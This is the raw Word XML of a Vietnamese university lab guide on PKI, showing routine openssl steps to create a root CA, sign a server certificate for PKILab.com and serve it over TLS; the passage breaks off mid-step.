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CA64" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000A2020" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34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2943447"/>
      <w:r w:rsidRPr="000A2020">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nội dung và hướng dẫn thực hiện bài lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="05131122" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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52943448"/>
      <w:r w:rsidRPr="000F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Mục đích</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="000F27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84FEAC" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="0099570E" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="45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150545656"/>
      <w:bookmarkStart w:id="3" w:name="_Toc150545742"/>
      <w:bookmarkStart w:id="4" w:name="_Toc151395039"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Giúp sinh viên hiểu được cơ sở hạ tầng khóa công khai </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>PKI ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> cách sử dụng PKI để bảo vệ web và tránh cuộc tấn công </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>MITM .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngoài ra sinh viên có thể hiểu thêm được chuyện gì sẽ xảy ra nếu trung tâm chứng chỉ gốc được tin cậy bị phá vỡ.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="542AE499" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4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52943449"/>
      <w:r w:rsidRPr="000F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Yêu cầu đối với sinh viên</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0C90B2CD" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00510772" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="45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151395041"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Có kiến thức cơ bản về hệ điều hành </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Linux,có</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> kiến thức cơ bản về hạ tầng khóa công khai PKI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="2628278F" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="47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52943450"/>
      <w:r w:rsidRPr="000F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Nội dung thực hành</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6D825E8E" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00B919EE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19EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tải bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7263F9" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00B919EE" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr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919EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>imodule https://github.com/congtoan123/labtainer-ptit-pki/raw/main/imodule.tar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687220FF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ộng bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68B2CC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terminal, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>gõ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A025FC" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:firstLine="1832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116A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">labtainer -r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ptit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-pki-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE0158" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00B919EE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chú ý: sinh viên sử dụng mã sinh viên của mình để nhập thông tin email người thực hiện bài lab khi có yêu cầu, để sử dụng khi chấm điểm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E69424" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:ind w:left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5116A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sau khi khởi động xong hai terminal ảo sẽ xuất hiện, một cái là đại diện cho</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> máy làm việc đặt tên là kpi_lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>, một máy là attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CDF6A2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0772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo chứng chỉ gốc CA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7B5841" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00510772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áy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server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FF58051" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00510772" w:rsidRDefault="00B039AD" w:rsidP="00B039AD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10772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo thư mục cha PKI và các thư mục con demoCA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184880F0" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039AD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10772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong demoCA gồm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cert,crl</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>newcerts,index.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00510772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và serial lưu giá trị là 100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3087450A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10772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mkdir PKI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50705FE8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cd PKI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C27DE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mkdir demoCA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D32284C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cd demoCA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5840AB60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mkdir certs crl newcerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FB6273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touch index.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFCA581" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00510772" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"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  <w:t>echo 1000&gt;serial</w:t>
      </w:r>
      <w:r w:rsidRPr="00510772"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660389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0772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Copy file cấu hình từ thư mục /usr/lib/ssl/openssl.cnf vào thư mục PKI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A23EB0" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00510772" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:ind w:left="216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10772">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cp “usr /lib/ssl/openssl.cnf” “/home/ubuntu/PKI”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4BCE50" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00815C32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 xml:space="preserve">Tạo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>chứng chỉ gốc CA và thông tin chữ kí và khóa công khai, khóa bí mật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A36BC43" w14:textId="77777777" w:rsidR="00B039AD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15C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>openssl req -x509 -newkey rsa:4096 -sha256 -days 3650 -keyout ca.key -out ca.crt -subj "/C=VN/ST=HN/L=HD/O=PTIT/OU=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ATTT</w:t>
      </w:r>
      <w:r w:rsidRPr="00815C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/CN=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&lt;MSV&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00815C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>" -passout pass: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&lt; your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E13115" w14:textId="77777777" w:rsidR="00B039AD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A24A4D4" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00560894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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra thông tin chứng chỉ gốc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>và khóa bí mật</w:t>
      </w:r>
      <w:r w:rsidRPr="00560894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AD44DAE" w14:textId="77777777" w:rsidR="00B039AD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i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>openssl x509 -in ca.crt -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4EA65" w14:textId="77777777" w:rsidR="00B039AD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i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>openssl rsa -in ca.key -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30910AE5" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF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F27AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>Tiếp theo ta sẽ tiến hành tạo chứng chỉ số cho máy chỉ PKILab.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475BC3BD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C3EA1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tạo yêu cầu chứng chỉ (CSR) và cặp khóa cho máy ch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KILab.com:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26710D9E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A2425B6" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF" w:rsidRDefault="00B039AD" w:rsidP="00B039AD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15C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>openssl req -newkey rsa:2048 -sha256 -keyout server.key -out server.csr -subj "/C=VN/ST=HN/L=HD/O=PTIT/OU=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ATTT</w:t>
      </w:r>
      <w:r w:rsidRPr="00815C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/CN=PKILab.com" -passout pass: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&lt;your password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C7A39D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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kiểm</w:t>
      </w:r>
      <w:r w:rsidRPr="00560894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> tra lại thông </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>tin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DC987A" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00560894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i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>openssl req -in server.csr -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D23D04" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00560894" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:ind w:left="72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60894">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>openssl rsa -in server.key -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017B7AE1" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083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2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Kí</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng chứng chỉ và khóa của </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>CA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925C018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15C32">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>openssl ca -config openssl.cnf -policy policy_anything -md sha256 -days 3650 -in server.csr -out server.crt -batch -cert ca.crt -keyfile ca.key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384763AD" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF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ển khai chứng chỉ trong 1 máy chủ web bằng cách cấu hình DNS map tên máy chủ tới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ocalhost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/etc/hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C7B05A" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00D72E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khóa và chèn thêm chữ kí</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C531A0" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00D72EAD" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="12"/>
        <w:ind w:left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72EAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72EAD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D72EAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server.key</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72EAD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D72EAD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>server.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400DCB86" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:spacing w:before="13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C2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2083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server.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2083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&gt;&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC2083">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">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server.pem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C45AC05" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="00DC2083" w:rsidRDefault="00B039AD" w:rsidP="00B039AD">
      <w:pPr>
        <w:spacing w:before="13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7E51B93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ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thiết lập máy chủ SSL/TLS đơn giản</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bằng lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5FB5A3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openssl s_server -cert server.pem -www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C802E2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1237BAE" w14:textId="77777777" w:rsidR="00B039AD" w:rsidRPr="000F27AF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lập quản lí chứng chỉ trên firefox đ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thể vào được web với giao thức https bằng chứng chỉ hợp lệ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594CAB69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D58B5E1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74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>iến h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ành</w:t>
      </w:r>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> sửa </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1 bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> khóa bí mật và kiểm </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C74ED1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tra :Sửa</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
